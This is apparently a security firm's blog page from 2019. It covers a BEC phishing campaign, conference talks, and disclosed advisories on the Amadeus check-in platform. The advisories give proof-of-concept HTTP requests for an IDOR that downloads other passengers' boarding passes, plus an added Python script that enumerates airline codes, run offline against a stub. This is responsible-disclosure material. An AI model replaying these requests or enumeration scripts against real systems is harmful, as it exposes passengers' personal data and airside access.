BEC Attacks via LinkedIn Email

A new business email compromise (BEC) campaign that uses compromised LinkedIn profiles to deliver its lure was identified by the team at 7 Elements today (7th November 2019).

The campaign delivers its message as LinkedIn email, enticing the recipient to follow a link that leads to a page prompting for email credentials. The phishing kit is relatively sophisticated: it supports multiple email providers, including Office 365, Gmail and Hotmail, and analysis of the kit also showed built-in evasion features designed to disrupt investigation by security vendors.

The following video demonstrates how an end user could be enticed to provide their email credentials via this campaign:

The campaign started at 07:03hrs on the 7th November 2019 and was still active at the point of publishing this advisory at 21:45hrs (14hrs later). In this period there had been over 1,900 visits to the phishing site, with 670 (35%) of those from the UK.

More detailed analysis of the phishing kit will follow in a later post.

 

CyberIsle2019

October the 23rd saw the inaugural Isle of Man Government Cyber Security Conference, 'CyberIsle 2019', where our CEO David Stubley was invited to speak on the subject of Business Email Compromise (BEC).

The talk covered the motivations for malicious actors looking to conduct such attacks, the anatomy of a successful attack and then three case studies based upon real life incidents that the team here at 7 Elements have managed for our clients.

The talk finished with mitigation advice that can be deployed by any organisation to reduce the risk of a successful compromise. The following document provides an overview of BEC and the core content from the presentation:

Anatomy of a BEC Attack – Release

The talk also looked at how malicious actors can gain credentials via attacks against externally facing infrastructure, such as Virtual Private Network (VPN) devices. More information on this can be found here: http://www.7elements.co.uk/resources/research/exploit-script-cve-2018-13379/

If you would like to discuss how to gain assurance over cloud based email solutions such as Office 365 then please get in touch with the team.

Exploit Script for CVE-2018-13379

While conducting further analysis of the path traversal vulnerability within the FortiOS SSL VPN web portal, the team at 7 Elements created a script to enumerate vulnerable hosts and extract sensitive information such as user names and passwords.

The following video shows the tool in action with the ability to scan multiple hosts (the script used for the purpose of the video masks sensitive information):

Using the script it was possible to enumerate ~200k hosts globally, identifying around 20,000 vulnerable hosts and extracting over 60,000 credentials (further blog post to follow).

Both the NSA and NCSC have recently posted advisories alerting on the use of this vulnerability by Nation State Advanced Persistent Threat (APT) actors to gain access to enterprise environments.

Over three weeks prior to those advisories, the team here at 7 Elements identified that what was then being reported as a medium-risk issue was in fact critical in impact. More on that can be found here.

Today we have released a version of the script that is limited to a single IP/host, intended for testing devices owned by the individual running it. The tool can be downloaded here.

 

CYBERISLE 2019

CYBERISLE 2019 is the Isle of Man government’s flagship cyber security event.

Hosted by the Office of Cyber Security & Information Assurance (OCSIA), CYBERISLE 2019 features world-class speakers, solutions and opportunities for interaction between the public and private sectors. The event is free to attend and will be at the Royal Hall, Villa Marina, Douglas, Isle of Man on the 23rd October 2019.

As part of the event, our CEO, Dave Stubley will deliver a talk on Protecting the Enterprise: Business Email Compromise.

Talk Introduction:

What does a successful compromise of an organisation's email system look like, and what can we do to protect ourselves?

A recent study by the U.S. Treasury Department revealed that business email compromise scams were costing U.S. companies more than $300 million a month, and the FBI warned that the total financial loss globally due to BEC attacks is at least $12.5 billion. Closer to home, the UK's National Cyber Security Centre (NCSC) reported that BEC attacks cost UK businesses £32 million (in 2017/18).

This talk will use real-life case studies from recent incidents to dissect the anatomy of a modern Business Email Compromise (BEC) attack, from current attack trends to mailbox manipulation and exfiltration of sensitive data through to onward compromise of new mailboxes. Building on this knowledge we will then explore easy to implement mitigation strategies.

For more information about CYBERISLE 2019 and to register, please visit the events page here.

Airline Enumeration within Amadeus Check-in Application

Advisory Information

Title: Airline Enumeration within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to enumerate supported airlines of the Amadeus Check-in Application using the URL generated as part of an airline mobile application check-in process.

Example of a link to a boarding pass generated by the platform:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URL provided is no longer valid as it is past the departure time).

The highlighted 'QS' (upper case in the first path segment, lower case in the second) is the two-letter IATA airline code of the carrier, so the URL structure itself identifies which airline a booking belongs to.

PoC

The following proof of concept shows that, because no authentication was required to access the resource and there was no brute-force protection, it was possible to automate an attack that enumerates the airlines supported by the platform.

Request (the § markers are Burp Intruder payload positions; the candidate two-letter code is substituted in upper case in the first path segment and in lower case in the second):

GET /1ASIHSSCWEB§OA§/sscw§oa§/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Jul 2019 11:48:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 7078

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>Olympic Air Internet check in</title>

Using Burp to do the heavy lifting:
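The Intruder run above survives only as a screenshot. The following Python script is an added example, not the advisory's own tooling, that reproduces the same enumeration logic: substitute every candidate two-character code into both path segments (upper case, then lower case), request the /mbp resource, and read the airline name back from the page title, as in the "Olympic Air Internet check in" response above. Network access is replaced by a constructed `fake_fetch` stand-in that only knows the OA, QS and BE codes mentioned on this page (the Smartwings and Flybe titles are illustrative), so it runs offline; swapping in a real HTTP client would target the live host, which must only be done with authorisation.

```python
"""Airline-code enumeration against the Amadeus /mbp URL structure.

Added example, not the advisory's Burp configuration. fetch(path) is injected
so the same logic can drive a real client or the offline stub below.
"""
import itertools
import re
import string
from typing import Callable, Dict, Iterable, Optional, Tuple

BASE = "https://checkin.si.amadeus.net"   # host from the advisory
SAMPLE_ID = "300193064"                    # id value from the advisory's request


def build_path(code: str, booking_id: str = SAMPLE_ID) -> str:
    """Return the /mbp path for a two-character IATA code.

    The advisory's request was /1ASIHSSCWEB§OA§/sscw§oa§/mbp?IFOI=DCS&id=...
    with the code upper case in the first segment and lower case in the second.
    """
    if not re.fullmatch(r"[A-Z0-9]{2}", code.upper()):
        raise ValueError(f"not a two-character IATA code: {code!r}")
    return (f"/1ASIHSSCWEB{code.upper()}/sscw{code.lower()}/mbp"
            f"?IFOI=DCS&id={booking_id}&ln=en&productIndex=0")


TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def airline_from_html(body: str) -> Optional[str]:
    """Pull the airline name out of a title such as
    '<title>Olympic Air Internet check in</title>' (the advisory's response)."""
    m = TITLE_RE.search(body)
    if not m:
        return None
    title = " ".join(m.group(1).split())
    return re.sub(r"\s+Internet check in$", "", title, flags=re.IGNORECASE) or None


def enumerate_airlines(fetch: Callable[[str], Tuple[int, str]],
                       codes: Optional[Iterable[str]] = None) -> Dict[str, str]:
    """Try every candidate code and keep those for which a check-in page is served."""
    if codes is None:
        alphabet = string.ascii_uppercase + string.digits   # IATA codes may contain digits
        codes = ("".join(p) for p in itertools.product(alphabet, repeat=2))
    found: Dict[str, str] = {}
    for code in codes:
        status, body = fetch(build_path(code))
        if status != 200:
            continue
        name = airline_from_html(body)
        if name:
            found[code] = name
    return found


# Constructed offline stand-in for the live host: only the codes that appear
# in these advisories get a page; everything else is a 404.
CONSTRUCTED_SITE = {
    "OA": "<html><head><title>Olympic Air Internet check in</title></head></html>",
    "QS": "<html><head><title>Smartwings Internet check in</title></head></html>",
    "BE": "<html><head><title>Flybe Internet check in</title></head></html>",
}


def fake_fetch(path: str) -> Tuple[int, str]:
    m = re.match(r"/1ASIHSSCWEB([A-Z0-9]{2})/sscw([a-z0-9]{2})/mbp", path)
    if m and m.group(1).lower() == m.group(2) and m.group(1) in CONSTRUCTED_SITE:
        return 200, CONSTRUCTED_SITE[m.group(1)]
    return 404, "<html><head><title>Not Found</title></head></html>"


if __name__ == "__main__":
    for code, name in sorted(enumerate_airlines(fake_fetch).items()):
        print(f"{code}: {name}")
```

The full alphabet is 36² = 1296 candidates, which is why the absence of any rate limiting on the endpoint mattered: a complete sweep is a few minutes of requests.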

Timeline

Advisory sent – 10th July 2019

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

Insecure Direct Object Reference within Amadeus Check-in Application

Advisory Information

Title: Insecure Direct Object Reference within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to download valid boarding passes (not belonging to the user) for future flights due to a weakness within the application (Insecure Direct Object Reference).

Example of a link to a boarding pass not belonging to the user:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0

Insecure Direct Object Reference (IDOR) vulnerabilities occur when an application provides direct access to objects based on user-supplied input, without enforcing the authentication and authorisation checks that should govern access to them.

The vulnerable site is: https://checkin.si.amadeus.net

The vulnerable parameter is the id field within the /mbp application endpoint.

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

The response shows a valid PDF document returned to the user.

Timeline

Advisory sent – 8th July 2019 (to FlyBe), 10th July 2019 (to Amadeus)

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish  – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

I know what you did this summer…

Introduction

In a recent technical advisory (which can be found here), 7 Elements disclosed that it was possible to download valid boarding passes for future flights that did not belong to the requesting user, affecting every airline using the Amadeus Check-in platform. This was due to a weakness within the application known as an Insecure Direct Object Reference (IDOR). See OWASP for more background on IDOR.

The following images show two boarding passes obtained through the IDOR vulnerability before the issue was remediated by Amadeus:

 

Impact

The IDOR vulnerability, combined with the ability to determine every airline using the platform, made this an issue that affected Amadeus globally and every airline utilising the platform. The issue also highlights the importance of gaining assurance that commercial off-the-shelf (COTS) solutions are fit for purpose, rather than placing trust solely in the solution provider's hands. As with most things in life, the old saying 'trust but verify' is still king.

PII – Downloading a valid boarding pass discloses the passenger's name and flight details. The boarding pass also carries the booking reference; with that and the surname it would be possible to access the booking itself and further sensitive information such as contact details (mobile phone number etc.).

Access to Restricted Areas – While further ID checks should prevent actual use of another passenger's boarding pass to board the flight, the boarding pass could still provide access airside within the departure terminal. As such, malicious use of this issue could result in unauthorised airside access at any airport served by an airline using the Amadeus platform. It should be noted that additional security controls may reject a boarding pass that has already been used to pass airside; however, those controls are not uniformly deployed across all airports.

Details

When using an airline branded mobile application to check-in, it was noted that the mobile application makes a call to the Amadeus hosted application to retrieve the boarding pass.

Screenshot showing the link to ‘Display Boarding Passes’:

Clicking on the link prompts the following response:

Opening a new web page to display the boarding pass.

The URL accessed contains a parameter called id. By changing the value of the id parameter, it was possible to access other valid boarding passes.

Example URL:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

The structure of the web request allows for other airlines that utilise the Amadeus platform to be targeted by changing the following two letter codes to match the relevant IATA airline code:

Example of a FlyBe request:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

Example of a Smartwings request:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URLs provided are no longer valid as it is past the departure time).

In addition to the IDOR vulnerability, it should be noted that no authentication was required to access the resource and there was no brute-force protection. Given this, it was possible to automate an attack to enumerate both the supported airlines and valid id values for boarding passes relating to any airline using the platform.

Screenshot showing the enumeration of airline companies using the Check-in platform:

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

The response shows a valid PDF document returned to the user.
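The proof of concept above (and the identical one in the advisory) shows the flaw from the attacker's side only. The following Python model is an added example, not Amadeus code, that puts the vulnerable pattern beside one hardened form so both can be exercised offline against constructed data. `VulnerableMbp` serves any pass whose sequential numeric id exists, which is exactly what stepping the id parameter exploited. `HardenedMbp` addresses each pass by an unguessable token issued at check-in (so walking the id space returns nothing), asks for the booking reference and surname printed on the pass as proof of ownership (so a leaked link alone is not enough), and counts failures per client, which is the brute-force control the post notes was absent. All class, field and token names are this example's own choices.

```python
"""Sequential-id IDOR on a boarding-pass endpoint: vulnerable and hardened forms.

Added example, not Amadeus code. Data, names and the token scheme are constructed
for illustration; ids follow the shape of the id=104421747 value on the page.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class BoardingPass:
    pass_id: int      # sequential DCS identifier, like id=104421747 on the page
    pnr: str          # booking reference printed on the pass
    surname: str
    flight: str
    pdf: bytes        # constructed stand-in for the real PDF body


# Constructed data: three passes with consecutive ids, as an enumerable id space looks.
PASSES: List[BoardingPass] = [
    BoardingPass(104421745, "ABC123", "SMITH", "BE1234", b"%PDF-1.3 pass-1"),
    BoardingPass(104421746, "DEF456", "JONES", "BE1234", b"%PDF-1.3 pass-2"),
    BoardingPass(104421747, "GHI789", "BROWN", "BE5678", b"%PDF-1.3 pass-3"),
]


class VulnerableMbp:
    """Direct object reference: the id is the lookup key and nobody is asked who they are."""

    def __init__(self, passes: List[BoardingPass]):
        self.by_id = {p.pass_id: p for p in passes}

    def mbp(self, pass_id: int) -> Optional[bytes]:
        p = self.by_id.get(pass_id)
        return p.pdf if p else None


@dataclass
class HardenedMbp:
    """Indirect reference + proof of ownership + per-client failure counter."""
    passes: List[BoardingPass]
    max_failures: int = 5
    tokens: Dict[int, str] = field(default_factory=dict)      # pass_id -> token
    by_token: Dict[str, BoardingPass] = field(default_factory=dict)
    failures: Dict[str, int] = field(default_factory=dict)    # client -> failed attempts

    def __post_init__(self):
        # The token is generated at check-in and embedded in the link the app
        # opens; it replaces the sequential id as the externally visible reference.
        for p in self.passes:
            tok = secrets.token_urlsafe(32)
            self.tokens[p.pass_id] = tok
            self.by_token[tok] = p

    def mbp(self, token: str, pnr: str, surname: str, client: str) -> Optional[bytes]:
        if self.failures.get(client, 0) >= self.max_failures:
            return None                                   # client locked out
        p = self.by_token.get(token)
        ok = (p is not None
              and hmac.compare_digest(p.pnr.encode(), pnr.upper().encode())
              and hmac.compare_digest(p.surname.encode(), surname.upper().encode()))
        if not ok:
            self.failures[client] = self.failures.get(client, 0) + 1
            return None
        return p.pdf


def walk_ids(lookup: Callable[[int], Optional[bytes]], start: int, end: int) -> int:
    """The attack from the advisory: step the id value and count what comes back."""
    return sum(lookup(i) is not None for i in range(start, end + 1))


if __name__ == "__main__":
    v = VulnerableMbp(PASSES)
    h = HardenedMbp(PASSES)
    print("vulnerable:", walk_ids(v.mbp, 104421740, 104421750))
    # Attacker knows one valid PNR/surname pair but holds no token: guessing ids fails
    print("hardened:  ", walk_ids(lambda i: h.mbp(str(i), "GHI789", "BROWN", "203.0.113.9"),
                                  104421740, 104421750))
    # The legitimate holder still succeeds with the link they were issued
    print("owner ok:  ", h.mbp(h.tokens[104421747], "GHI789", "BROWN", "198.51.100.4") is not None)
```

Of the three controls, the unguessable token is the one that removes the enumeration problem outright; the ownership check limits the damage of a forwarded or logged link, and the failure counter is what turns a sweep of the id space from free into noisy.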

 

Threat Hunting

The slides from 'Threat Hunting in the O365 Ecosystem', given at the International Conference on Big Data in Cyber Security, are now online and can be found here:


The video of the talk can be found here:

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in the DL100 Cyber Resilience Innovation of the Year category for the second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and a robust partnership model that delivers when needed. Our partnership clients only ever pay for the effort that they use, at costs agreed up front, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in downtime and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SMEs access to the same level of incident response services as blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step-by-step plan which, on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer

 

If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.

 

More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security


Our CEO, David Stubley, will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Security Information and Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry, including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase good practice in industry and in network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.